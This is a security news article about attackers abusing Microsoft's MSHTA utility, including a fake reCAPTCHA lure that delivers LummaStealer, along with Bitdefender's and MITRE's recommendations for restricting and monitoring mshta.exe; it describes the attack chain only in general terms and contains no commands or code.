Attackers are still abusing Microsoft’s legacy MSHTA utility to deliver malware, according to new Bitdefender research. But the bigger issue is not the MSHTA aging Windows component. It is the pattern security teams keep running into – old tools, still trusted, still enabled and still useful to attackers.
MSHTA was designed to run Microsoft HTML Applications. Because it ships with Windows 11, operates as a legitimate Microsoft-signed binary and can blend into normal system activity, attackers have repeatedly used it as a delivery and execution tool.
Bitdefender said both consumers and enterprises are at risk. Successful attacks can lead to stolen passwords, hijacked browser sessions, drained cryptocurrency wallets and, in more advanced cases, persistent access to compromised machines.
Because MSHTA is not a vulnerability there is no patch to apply. It is a built-in Windows feature being abused as designed. MITRE has tracked MSHTA abuse for years as ATT&CK technique T1218.005.
Microsoft has responded with controls, not removal. The company recommends blocking outbound mshta.exe connections, monitoring MSHTA activity and moving legitimate HTA applications to modern alternatives such as Progressive Web Apps or Microsoft Edge WebView2. It has not announced a deprecation timeline for MSHTA.
Legit app, illicit use
The abuse of legit platform tools for nefarious ends isn’t new. Security practitioners call this living off the land. Instead of bringing obvious malware tools into an environment, attackers abuse legitimate operating system components already installed there. PowerShell, Office macros, Windows Management Instrumentation, PsExec and other trusted tools have all followed similar arcs.
MSHTA sits in the same category: old enough to escape regular scrutiny, but still functional enough to create real risk.
Legitimate uses of MSHTA include IT teams using it to display pop-up notifications or run simple scripts without opening a full browser window. Bitdefender said about 10% of its MSHTA telemetry still consists of simple administrative one-liners.
MSHTA bull’s-eye
That legitimate use is also what makes MSHTA attractive to attackers. It can run script code, retrieve content from remote servers and execute in memory without writing files to disk.
One Bitdefender example shows MSHTA used in a fake verification scheme. The victim lands on a page that looks like a reCAPTCHA check. The page secretly copies a malicious command to the clipboard, then tells the user to press Windows + R, paste the command and hit enter.
That command launches mshta.exe, which reaches out to a remote server and runs a hidden HTA script. The script then hands off to PowerShell, which downloads and runs the final malware in memory. In Bitdefender’s example, the final payload was LummaStealer, a commodity information stealer used to grab passwords, browser data, session tokens and cryptocurrency-related data.
“What may begin as the execution of a seemingly innocuous legacy Windows utility can quickly lead to account theft, financial fraud, data loss, or broader infection of the affected system,” said Janos Gergo Szeles, senior software engineer at Bitdefender.
Abuse of MSHTA has a long history. MITRE links the technique to nation-state groups including Kimsuky, Lazarus Group and MuddyWater; financially motivated crews including FIN7 and APT38; and malware families including LummaStealer, WhisperGate, BabyShark and Koadic. MITRE’s mitigation guidance is direct: Block mshta.exe execution where possible using Windows Defender Application Control or AppLocker.
What defenders should do
Bitdefender recommends organizations audit whether MSHTA is in active use in their environment and disable or restrict it where it is not.
Because roughly 10 percent of real-world MSHTA activity is still legitimate administrative use, blanket blocking requires care — defenders need to distinguish malicious mshta.exe invocations from benign ones, which typically means monitoring command-line arguments for remote URLs and unusual parent processes.
The firm also recommends layered technical controls and user awareness training targeting ClickFix-style lures specifically, given how consistently social engineering serves as the entry point across the campaigns it documented.
(Security Point Break illustration)
